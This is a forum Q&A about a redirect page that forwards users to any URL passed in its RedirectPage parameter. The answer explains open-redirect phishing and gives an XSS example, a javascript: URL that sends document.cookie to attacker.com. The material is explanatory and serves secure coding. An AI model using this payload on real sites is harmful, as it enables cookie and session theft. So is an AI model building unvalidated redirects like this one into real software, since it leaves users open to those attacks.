Tags: html, security, xss, exploit

Can you find the web security issue here?


I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)


Solution

  • It's a big problem. If I send you a link that looks like this:

     http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
    

    You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

    The hole here is your reputation. Blind redirects like this are dangerous.

    And that's just one hole. How about this?

     http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
    

    Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.